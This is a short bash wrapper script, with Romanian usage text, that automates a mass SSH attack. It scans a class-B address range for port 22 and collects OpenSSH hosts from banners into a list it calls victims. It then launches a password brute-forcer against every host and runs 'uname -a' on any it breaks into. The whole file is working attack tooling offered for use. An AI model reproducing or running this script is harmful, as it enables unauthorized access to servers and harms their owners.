#!/bin/bash

WHI='[1;37m'
BLK='[1;30m'
RED='[1;31m'
YEL='[1;33m'
BLU='[1;34m'
RES='[0m'
if [ $# != 1 ]; then
        echo "${WHI}   Folosim: $0 <b class>${RES}"
        exit;
fi
./portscan 22 -a $1 -i eth0 -s 10
pkill -f portscan
clear
./banner bios.txt 22 350
pkill -f banner
sleep 5
cat banner.log  |grep SSH-2.0-OpenSSH |awk '{print $1}' |uniq |shuf >> ips.lst
victims=`grep -c . ips.lst`
clear
echo "[0;32m<[1;37m![0;32m>[1;37m Total vulnerabile servers >[0;32m $victims [0;32m<[1;37m![0;32m>"
sleep 2
./brute 3000 -f ips.lst pass.lst 22 "uname -a"
sleep 5
pkill brute


